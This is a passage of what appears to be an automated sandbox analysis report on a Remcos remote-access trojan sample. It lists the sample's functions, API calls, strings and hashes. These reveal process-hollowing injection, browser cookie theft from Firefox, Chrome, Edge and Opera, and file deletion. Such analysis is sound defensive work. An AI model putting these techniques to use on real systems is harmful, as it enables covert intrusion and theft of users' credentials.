                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                                                                                                                                                              • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$Exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$fyhstga-ONSWMZ$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 2830904901-2899612153
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a28a479395dd4b36e7fa7ec9b6143bb4397350d073e7f97df4225f93239b266a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a28a479395dd4b36e7fa7ec9b6143bb4397350d073e7f97df4225f93239b266a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
                                                                                                                                                                                                                                                                                                                              Function 00417245 Relevance: 61.5, APIs: 29, Strings: 6, Instructions: 290nativelibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 452 4175cf-4175d9 449->452 450->449 451 4172ec-4172f3 450->451 451->449 453 4172f9-4172fb 451->453 453->449 454 417301-41732d call 436060 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ae0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 480 417522-417528 478->480 481 41753e-417542 478->481 482 4174e6-417509 call 435ae0 479->482 480->481 483 41752a-41753b call 417651 480->483 484 417544-417560 WriteProcessMemory 481->484 485 417566-41757d Wow64SetThreadContext 481->485 493 41750b-417512 482->493 483->481 484->463 488 417562 484->488 485->463 489 41757f-41758b ResumeThread 485->489 488->485 489->463 492 41758d-41758f 489->492 492->452 493->478
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                                                                                                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                                                                                                                                                                                                                              • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                                                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                                                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 0041744A
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                                                                                                                                                                                                                              • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                                                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                                                                                                                                                                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                                                                                                                                                                                                                                                              • NtClose.NTDLL(?), ref: 004175B6
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                                                                                                                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                                                                                                                                                                                                                              • API String ID: 3150337530-108836778
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2a1bc7bdc729258c18c32f0bb95ec7660c06bfb5025054df3919bc75ccc59624
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0508007fc5a19f335f37bc9d6881170284180ec94406780ecb3836aa2a2a6048
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFA17CB1508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E779E984CB6A
                                                                                                                                                                                                                                                                                                                              Function 100012CB Relevance: 17.3, APIs: 2, Strings: 9, Instructions: 828COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 1820 100012cb-100012fb call 10004160 call 10005f20 1825 100012fd-10001306 1820->1825 1826 1000133e-10001348 1820->1826 1829 10001315-10001339 call 10003b90 1825->1829 1830 10001308-10001310 call 10004160 1825->1830 1827 10001354-10001366 call 10006020 1826->1827 1828 1000134a-1000134f call 10004160 1826->1828 1836 10001368-10001371 1827->1836 1837 100013a9-100013b3 1827->1837 1828->1827 1829->1826 1830->1829 1838 10001380-100013a4 call 10003b90 1836->1838 1839 10001373-1000137b call 10004160 1836->1839 1840 100013b5-100013ba call 10004160 1837->1840 1841 100013bf-100013d1 call 10006120 1837->1841 1838->1837 1839->1838 1840->1841 1847 100013d3-100013d9 1841->1847 1848 1000140b-10001415 1841->1848 1849 100013e8-10001406 call 10003b90 1847->1849 1850 100013db-100013e3 call 10004160 1847->1850 1851 10001421-100015eb call 10005c00 call 10003a70 call 100067d0 call 10003a70 call 100067d0 call 10003a70 call 100067d0 call 10007a40 call 10003a70 * 2 call 10001ee0 1848->1851 1852 10001417-1000141c call 10004160 1848->1852 1849->1848 1850->1849 1888 100015f1-100015f5 1851->1888 1889 100017ea-100017fd 1851->1889 1852->1851 1891 10001848-1000184d call 1000a5c6 1888->1891 1892 100015fb-10001626 1888->1892 1890 10001800-10001802 call 10007e20 1889->1890 1898 10001807-10001809 1890->1898 1899 10001852 1891->1899 1895 10001628-1000162a 1892->1895 1896 1000162c 1892->1896 1897 1000162e-10001650 call 10003a70 call 10006220 1895->1897 1896->1897 1913 10001652 1897->1913 1914 10001654-10001666 call 100025a0 1897->1914 1901 10001815-1000183d 1898->1901 1902 1000180b-10001813 Sleep 1898->1902 1903 10001854-1000188e call 10003a70 1899->1903 1901->1899 1905 1000183f-10001841 1901->1905 1902->1890 1902->1901 1909 10001890-10001892 1903->1909 1910 10001894 1903->1910 1905->1903 1912 10001896-100018dc call 10003a70 call 10001ee0 1909->1912 1910->1912 1930 10001ae1-10001aee 1912->1930 1931 100018e2-100018e6 1912->1931 1913->1914 1918 1000166b-10001679 1914->1918 1920 1000167b-10001681 1918->1920 1921 100016dc-100016e6 1918->1921 1925 100016c1-100016d7 call 100040f0 1920->1925 1926 10001683-1000168c 1920->1926 1923 10001726-10001742 1921->1923 1924 100016e8-100016f1 1921->1924 1927 10001744-10001749 call 10004160 1923->1927 1928 1000174e-1000177f call 10004c10 call 10003ff0 1923->1928 1932 100016f3-100016f6 1924->1932 1933 1000171d-10001723 call 1000a956 1924->1933 1925->1921 1934 100016b8-100016be call 1000a956 1926->1934 1935 1000168e-10001691 1926->1935 1927->1928 1967 10001781-1000178b 1928->1967 1968 100017bf-100017e4 1928->1968 1944 10001af0-10001af9 call 10007e20 1930->1944 1931->1891 1939 100018ec-10001917 1931->1939 1940 10001843 call 1000daab 1932->1940 1941 100016fc-10001701 1932->1941 1933->1923 1934->1925 1935->1940 1942 10001697-1000169c 1935->1942 1947 10001919-1000191b 1939->1947 1948 1000191d 1939->1948 1940->1891 1941->1940 1950 10001707-1000170c 1941->1950 1942->1940 1951 100016a2-100016a7 1942->1951 1959 10001b05-10001b2d 1944->1959 1960 10001afb-10001b03 Sleep 1944->1960 1956 1000191f-10001941 call 10003a70 call 100063b0 1947->1956 1948->1956 1950->1940 1957 10001712-10001715 1950->1957 1951->1940 1958 100016ad-100016b0 1951->1958 1978 10001943 1956->1978 1979 10001945-10001957 call 100025a0 1956->1979 1957->1940 1962 1000171b 1957->1962 1958->1940 1964 100016b6 1958->1964 1965 10001b33 1959->1965 1966 10001b2f-10001b31 1959->1966 1960->1944 1960->1959 1962->1933 1964->1934 1970 10001b35-10001b6f call 10003a70 1965->1970 1966->1970 1971 100017b6-100017bc call 1000a956 1967->1971 1972 1000178d-1000178f 1967->1972 1968->1889 1968->1892 1984 10001b71-10001b73 1970->1984 1985 10001b75 1970->1985 1971->1968 1972->1940 1975 10001795-1000179a 1972->1975 1975->1940 1981 100017a0-100017a5 1975->1981 1978->1979 1987 1000195c-1000196a 1979->1987 1981->1940 1986 100017ab-100017ae 1981->1986 1988 10001b77-10001bab call 10003a70 call 10001ee0 call 10003420 1984->1988 1985->1988 1986->1940 1989 100017b4 1986->1989 1990 1000196c-10001972 1987->1990 1991 100019cd-100019d7 1987->1991 2024 10001bb1-10001c56 call 100033e0 call 10003500 call 100064b0 call 10003450 call 100025a0 call 10003730 call 100036c0 call 10003460 call 10004c10 call 100036a0 call 100036c0 call 10003420 1988->2024 2025 10001c5c-10001c7c call 10003450 call 10007de0 call 10004c10 1988->2025 1989->1971 1995 100019b2-100019c8 call 100040f0 1990->1995 1996 10001974-1000197d 1990->1996 1993 10001a17-10001a33 1991->1993 1994 100019d9-100019e2 1991->1994 2002 10001a35-10001a3a call 10004160 1993->2002 2003 10001a3f-10001a70 call 10004c10 call 10003ff0 1993->2003 1998 100019e4-100019e7 1994->1998 1999 10001a0e-10001a14 call 1000a956 1994->1999 1995->1991 2000 100019a9-100019af call 1000a956 1996->2000 2001 1000197f-10001982 1996->2001 1998->1940 2006 100019ed-100019f2 1998->2006 1999->1993 2000->1995 2001->1940 2007 10001988-1000198d 2001->2007 2002->2003 2028 10001ab0-10001ad5 2003->2028 2029 10001a72-10001a7b 2003->2029 2006->1940 2013 100019f8-100019fd 2006->2013 2007->1940 2014 10001993-10001998 2007->2014 2013->1940 2021 10001a03-10001a06 2013->2021 2014->1940 2022 1000199e-100019a1 2014->2022 2021->1940 2026 10001a0c 2021->2026 2022->1940 2027 100019a7 2022->2027 2024->2025 2048 10001c81-10001ed0 call 10004be0 * 11 call 100036c0 * 11 call 100038d0 * 3 call 10003460 * 5 call 100036c0 * 8 2025->2048 2026->1999 2027->2000 2028->1939 2035 10001adb 2028->2035 2032 10001aa7-10001aad call 1000a956 2029->2032 2033 10001a7d-10001a80 2029->2033 2032->2028 2033->1940 2037 10001a86-10001a8b 2033->2037 2035->1930 2037->1940 2041 10001a91-10001a96 2037->2041 2041->1940 2045 10001a9c-10001a9f 2041->2045 2045->1940 2049 10001aa5 2045->2049 2049->2032
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1233981215
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ec441cf6cc5d574dc3d9e533db66c2798fe9b2d1f890f10e919fe81ba7d73607
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4572D174D00208DBFB19DB64CC55BEE77B5EF41344F208198E406AB296DB71AF49CBA2
                                                                                                                                                                                                                                                                                                                              Function 10005C00 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 233fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 10005CB2
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,?), ref: 10005D2C
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10005E68
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 10005E8C
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10005E97
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10005EDA
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Find$File$CloseNext$ExistsFirstPath
                                                                                                                                                                                                                                                                                                                              • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                                                                                                              • API String ID: 913281501-405221262
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 275ccd61f0080d118aa158f5f31b7f4775243eb66532934bf8ec06ad449fd071
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d69103c2b3bb7b0ef1279a73142a9cc332cbad18a963587697917916d0a93de4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 275ccd61f0080d118aa158f5f31b7f4775243eb66532934bf8ec06ad449fd071
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8181D270D00249DAFB14DFA0DC49BEEB7B5FF14385F61416AE805A7255EB32AE44CB20
                                                                                                                                                                                                                                                                                                                              Function 10007E20 Relevance: 13.7, APIs: 9, Instructions: 188fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,00000000,76230F00), ref: 10007ED1
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,?,?,00000000,76230F00), ref: 10007F0A
                                                                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?,00000000,76230F00), ref: 10007FFA
                                                                                                                                                                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,00000000,76230F00), ref: 1000802D
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,00000000,76230F00), ref: 1000803A
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,76230F00), ref: 1000806D
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,76230F00), ref: 10008079
                                                                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?,00000000,76230F00), ref: 10008082
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,00000000,76230F00), ref: 1000808C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2341273852-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5879e413a2d9e2f3862ed2fa56462b92cd9797ab3db8e6e954221e2a185392ff
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 924e4a1749d0d59d34f62a1f8ef7dddde271016198b3f9fb598245e3bb22b1f8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC61F03890025B8AEB50DF64C885BF6B3B5FF143D4F5141E9EC0997295EB329E86CB60
                                                                                                                                                                                                                                                                                                                              Function 028310F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 02831137
                                                                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831151
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283115C
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283116D
                                                                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 0283117C
                                                                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 02831193
                                                                                                                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 028311D0
                                                                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 028311DB
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1083526818-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5c6fa1c002a9720762430db8fb11c71e5babb0f14bac1e1abc3ef700af00d394
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9e22a5ea04466266cf9748a27aa36caa1ba497c442adaf70788f175e8c3459b2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c6fa1c002a9720762430db8fb11c71e5babb0f14bac1e1abc3ef700af00d394
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87218F7A944308ABD721EA649C4CF9B7B9CEF84714F040D2AB958D31D0EB30D6158BD6
                                                                                                                                                                                                                                                                                                                              Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                                                                                                                                                              • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 2281282204-3981147832
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 44b1d2c152bb9255bdf401e2d89c1c425db5076c8a15731edfcb727ca5984d46
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
